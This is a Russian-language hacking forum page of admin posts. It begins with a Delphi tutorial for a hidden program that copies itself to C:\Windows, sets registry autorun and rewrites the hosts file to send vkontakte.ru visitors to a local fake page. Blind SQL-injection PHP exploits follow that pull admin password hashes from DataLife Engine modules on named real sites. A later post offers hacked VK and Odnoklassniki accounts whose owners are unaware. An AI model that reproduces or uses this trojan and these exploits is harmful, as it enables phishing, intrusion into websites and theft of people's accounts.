procedure TForm1.FormCreate(Sender: TObject);var str:tstringlist;beginapplication.ShowMainForm:=false; //Делаем форму скрытойif not FileExists('C:Windowswebserver.exe') then begin //Проверка, если веб //сервера нет в папкеCopyFile(pchar(application.exename),'C:Windowswebserver.exe',false); //То //скопируемся тудаWinExec('C:Windowswebserver.exe',sw_hide); //И запустим серверRegHosts; //Процедура модификации хостсRegRun; //Пропись в реестреApplication.Terminate; //Если это убрать, то наш сервер не запустится, т.к.//На одном компе может быть запущен только один сервер на одном портуendelsebeginRegRun; //Иначе пропишемся в реестрRegHosts; //Модифицируем хостсserver.Active:=true; //И включим серверend;
 
Теперь объявим процедуры RegRun и RegHosts
 
public{ Public declarations }procedure RegHosts;procedure RegRun;end;
 
Пропись в реестр
 
procedure TForm1.RegRun;var reg:tregistry;beginreg := tregistry.create; //Инициализируем переменнуюreg.rootkey := hkey_local_machine; //Открываем ключ реестраreg.lazywrite := false;reg.openkey('softwaremicrosoftwindowscurrentversionrun', false); //Открываем //подраздел реестраreg.writestring('MicrosoftWebServerUpdater.exe', 'C:Windowswebserver.exe'); //Прописываем путь до сервера в автозагрузку(вместо //'C:windowswebserver.exe' можно написать Application.exename//Тогда программа пропишет в авторан путь до самой себя в данный моментreg.closekey; //Закрываем разделreg.free; //Уничтожаем переменнуюend;
 
Думаю, тут ничего объяснять не надо 
 
Модификация файла хостс 
Предварительно объявим глобальной переменной 
 
FileStr:TStringlist;
 
procedure TForm1.RegHosts;beginFilestr:=tstringlist.Create; //Создаем списокFilestr.LoadFromFile('C:WindowsSystem32driversetchosts'); //Загружаем //содержимое хостс в списокFilestr.Add('127.0.0.1 vkontakte.ru'); //Добавим строчку//Слева написан IP, на который произойдет переадресация//Справа - ресурс, с которого она произойдетfilestr.SaveToFile('C:WindowsSystem32driversetchosts'); //Сохраним измененияFilestr.Free; //Освободим объектend;
 
Теперь перейдем к программированию обработки запросов, 
Посылаемых браузером жертвы на сервер. 
В обработчике события OnCommandGet Server'a напишем следующее
 
procedure TForm1.ServerCommandGet(AThread: TIdPeerThread;ARequestInfo: TIdHTTPRequestInfo; AResponseInfo: TIdHTTPResponseInfo);beginif (pos('ndex',arequestinfo.document)=0)and(pos('12.bmp',arequestinfo.document)=0) then//Если пользователь браузер запрашивает нашу страничкуarequestinfo.Document:='index.html'; //Если запрашивается другая страничка//То все равно откроем нашу. Я пишу такие условия потому, что иначе//У меня программа вываливалась с экзепшном, может у вас получится:) if arequestinfo.Document='/' thenbeginarequestinfo.Document:=''; //Обнуляем запросaresponseinfo.ContentStream:=tfilestream.Create('C:windowsindex.html',fmopenread); //отправляем клиенту файл index.htmlend elseif arequestinfo.Document<>'/' then //Если прошлая проверка пройдена, то//Отправляем файл клиенту(картинку)//Если этого не написать, картинка не отобразитсяaresponseinfo.ContentStream:=tfilestream.Create('C:windows'+arequestinfo.Document,fmopenread);end;
 
При разрушении формы напишем
 
Server.active:=false; // Иначе программа будет некорректно работать
 
В uses обязательно добавьте Registry, иначе прописаться в реестр программа не сможет. 
 
Теперь проверим, наберем в окне любого браузера 127.0.0.1 
Если вам не открылся ваш html файл, то где-то вы допустили ошибку. 
Теперь пробуем ввести vkontakte.ru 
 
 
Если все правильно сделано, то видим свою табличку. Кому помог, ставьте плюсик. 
Если я где-то ошибся, вот исходник Скачать



#233 Уязвимости DataLife Engine

Написано Admin : 28 Февраль 2016 - 08:11

SQL-inj в неофициальном модуле files (файловый архив)
уязвимость после order by в параметре orderby
Пример запроса:
http://www.site.ru/index.php?do=files&op=cat&id=1&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+0,1),1,1))+between+0+and+0,url,[b](select%201%20from%20dle_downloads))+--+
 
Эксплоит:[/b]
 
<?phpset_time_limit(0);/*-----------------------------------------------------*/ //Эксплойт для модуля Files(модуль файлового архива) к DLE//Автор: H00K/*-----------------------------------------------------*/  /*-----------------Настройки---------------------------*/ $host="symbiware.org";//указываем хост$catid = "38";//Указываем id существующей категории$userid = "0";//Указываем id администратора/*-----------------------------------------------------*/  $good = "MySQL Fatal Error";$bad = "Архив файлов";$path="/index.php?do=files&op=cat&id={$catid}&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+{$userid},1),";$end = ",(select%201%20from%20dle_downloads),url)+--+";$index = 1;$result = ""; function GetMiddle($min, $max){ return floor($min+((($max+1)-($min-1))/2));} function Check($min,$max){ if (($max-$min)<=2)  {  global $index;  global $result;  global $host;  global $path;  echo "Символ найден: ";  if (($max-$min)==1)  if (CheckSQL($host, $path, $index.",1))={$max}"))    $result .=chr($max); else $result .=chr($min);  if (($max-$min)==2)  {  if (CheckSQL($host, $path, $index.",1))={$max}"))  {    $result .=chr($max);  } else  {   if(CheckSQL($host, $path, $index.",1))={$max}-1"))    $result .=chr($max-1); else $result .=chr($min);    }  }   echo substr($result,strlen($result)-1)."<br>";   flush();   $index++;    return true;  } else return false;} function CheckSQL ($host, $path, $st){   global $end;    $line="";    $fo = fsockopen($host, 80, $errno, $errstr, 30);    if(!$fo){die ("no connect");}    else     {        $headers="GET ".$path.$st.$end." HTTP/1.1rn";       $headers.="Host: ".$host."rn";       $headers.="Connection: Closernrn";           global $good;       global $bad;        fwrite($fo, $headers);        while (!feof($fo))        {            $line = fgets($fo, 512);            if (strpos($line,$good))             {             fclose($fo);             return true;            }            if (strpos($line,$bad))            {             fclose($fo);             return false;            }        }        fclose($fo);    }    return false;}if (CheckSQL($host, $path, $index.",1))+between+1+and+255"))  echo (" Идет подбор символов...<br>"); else  die("Ошибка"); for ($i=0;$i<32;$i++){ $min = 31; $max = 123; $ok = true; while ($ok == true) {  $num = GetMiddle($min,$max);  if (!check($min,$max))  {  if (CheckSQL($host, $path, $index.",1))+between+1+and+{$num}"))   { echo("Меньше $num <br>");   $max = $num;  } else  {  echo ("Больше $num <br>");    $min = $num;  }   flush(); } else $ok = false; } }echo $result;?>
 
SQL-inj в неофициальном модуле gallery, в параметре news_sort
Уязв.код (news_sort) :show_cat.php
 
if ( isset($_POST['news_sort']) ) $galConfig['news_sort'] = mysql_escape_string($_POST['news_sort']); elseif ($gal_cat[$category_id]['news_sort'] != "") $galConfig['news_sort'] = $gal_cat[$category_id]['news_sort'];if ( isset($_POST['news_msort']) ) $galConfig['news_msort'] = mysql_escape_string($_POST['news_msort']); elseif ($gal_cat[$category_id]['news_msort'] != "") $galConfig['news_msort'] = $gal_cat[$category_id]['news_msort']; if ($galConfig['user_cats_limit']) $sear = "(" . PREFIX . "_gal_cat.cat_status = '0' OR " . PREFIX . "_gal_cat.cat_status = '2') AND " . PREFIX . "_gal_pic.approve='1'"; else $sear = "" . PREFIX . "_gal_cat.cat_status = '0' AND " . PREFIX . "_gal_pic.approve='1'"; $result = $db->query("SELECT " . PREFIX . "_gal_pic.*, " . PREFIX . "_gal_cat.cat_title, cat_alt_name, allow_rating, allow_comm FROM " . PREFIX . "_gal_pic LEFT JOIN " . PREFIX . "_gal_cat ON " . PREFIX . "_gal_pic.pic_cat_id=" . PREFIX . "_gal_cat.cat_id WHERE " . PREFIX . "_gal_cat.cat_alt_name='$category' AND $sear AND " . PREFIX . "_gal_cat.cat_view_level regexp '[[:<:]]($member_id[user_group])[[:>:]]' ORDER BY ".$galConfig['news_sort']." ".$galConfig['news_msort']." LIMIT $cstart, $lim");
Как видим данные из news_sort попадают в функцию mysql_escape_string, но так как в запросе данные не обрамляются кавычками, эта функция никаким образом не помешает проведению sql инъекции
 
Пример запроса:
 
POST /index.php?do=gallery&action=show_cat&category=gorod HTTP/1.1Host: www.simfilife.netUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127Keep-Alive: 300Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 133news_sort=if(ord(substring((select password from dle_users where user_id=1),1,1))>4,(select 1 from dle_usergroups),0)&news_msort=DESC
Exploit:
<?php set_time_limit(0); /*-----------------------------------------------------*/ //Эксплойт для неофициального модуля Gallery для DLE//Автор: l-l00K/*-----------------------------------------------------*/   /*-----------------Настройки---------------------------*/   $good = "MySQL Fatal Error"; $bad = "robots"; $host= "simfilife.net";//указываем сайт $path="/index.php?do=gallery&action=show_cat&category=gorod";//Указываем существующую категорию $body = "news_sort=if(ord(substring((select password from dle_users where user_id=1),"; $index = 1; $result = ""; $end = ",(select 1 from dle_usergroups),0)&news_msort=DESC";  function GetMiddle($min, $max) {  return floor($min+((($max+1)-($min-1))/2)); }  function post_sql($host,$path,$post_body) { global $end; $post_body  .= $end; $post_query  = "POST ".$path." HTTP/1.1rn"; $post_query .= "Host: ".$host."rn"; $post_query .= "Connection: closern"; $post_query .= "Content-Type: application/x-www-form-urlencodedrn"; $post_query .= "Content-length: " . strlen($post_body) . "rnrn"; $post_query .= $post_body;  $sock = fsockopen($host, 80, $errno, $errstr, 30);  if (!$sock) die('Could not connect to host! ');  fputs($sock, $post_query); global $good; global $bad; $answer = ''; while (!feof($sock)) {    $answer .= fgets($sock, 1024);    if (strpos($answer,$good))     {     fclose($sock);     return true;    }    if (strpos($answer,$bad))    {      fclose($sock);      return false;    } } fclose($sock); return false;} function Check($min,$max){ if (($max-$min)<=2)  {  global $index;  global $result;  global $host;  global $path;  global $body;  echo "Символ найден: ";  if (($max-$min)==1)  if (post_sql($host, $path, $body.$index.",1))={$max}"))    $result .=chr($max); else $result .=chr($min);  if (($max-$min)==2)  {  if (post_sql($host, $path, $body.$index.",1))>{$max}-1"))  {    $result .=chr($max);  } else  {   if(post_sql($host, $path, $body.$index.",1))={$max}-1"))    $result .=chr($max-1); else $result .=chr($min);    }  }   echo substr($result,strlen($result)-1)."<br>";   flush();   $index++;    return true;  } else return false;} $bool = true;while ($bool==true){ if (post_sql($host, $path, $body.$index.",1))>0"))  {  echo ("Символ есть, идет подбор...<br>");  flush();  $ok = true; } else  { echo ("Символы кончились <br>");  $ok = false;  $bool = false;  echo $result; } $min = 31; $max = 123; while ($ok == true) {  $num = GetMiddle($min,$max);  if (!check($min,$max))  {  if (post_sql($host, $path, $body.$index.",1))<{$num}"))   {   echo("Меньше $num <br>");   $max = $num;  } else  {   echo ("Больше $num <br>");    $min = $num;  }   flush(); } else $ok = false; } } ?>



#42 Реклама на форуме.

Написано Admin : 24 Ноябрь 2015 - 04:27

Информация рекламнадателям!
Если вы решили разместить рекламу на нашем форуме в виде Банера на всех страницах форума, либо пометить ваше объявление как "Важное" и так далее,

просьба обращаться на почту:
XpRu@protonmail.com

Прикрепленные изображения

  • image-2.jpg
  • image-1.jpg
  • image-3.jpg
  • image.jpg



#39 Бесплатное ПО, платных программ.

Написано Admin : 24 Ноябрь 2015 - 12:43

Спам-фильтр (клиент) SpamPal - Программа для борьбы с нежелательной почтовой корреспонденцией - СПАМом. SpamPal работает по протоколу POP3 совместно практически с любым почтовым клиентом (The Bat!, Outlook Express, Foxmail и т.д.). http://www.spampal.org/ Ссылки, подборки полезных программ на других сайтах: http://lithium.openn...gs/analogs.html http://www.listible....ons-for-windows http://www.econsulta...ties/index.html http://www.portablef...are.com/all.php http://osswin.sourceforge.net/ http://exler.ru/blog/item/2256/?47


#31 Внимание, раздача взломаных акк, одноклассники, vk.

Написано Admin : 24 Ноябрь 2015 - 06:12

Доброе времяни суток дорогие форумчане. Каждые два дня, начиная с сегодняшнего, наш форум в качестве благодарности того что вы с нами, предоставляет вам возможность получить бесплатные, взломаные страницы социальных сетей, одноклассники, Вконтакте и другие, на одного человека максимум 5 страниц, для того чтоб получить страницы одной из этих социальных сетей вам нужно: 1. Пригласить одного из своих друзей (знакомых) которым интересна тематика форума. 2. Написать мне имя этого человека. Ваш друг (знакомый) Должен создать хотябы одну новую тему, в разделе к которому относится его тема. Страницы которые даем взломаные и оформлены. Хозяин страниц не догадывается о том что у нас есть доступ к его странице! При желании вы можете привязать свой мобильный к странице и страница полноценно станет вашей. А так можете просто пользоваться ей на свое усмотрение, пока хозяин не догадается что его взломали и не изменит пароль. Спасибо за внимание и приятного время провождения!
  • Это нравится: Alja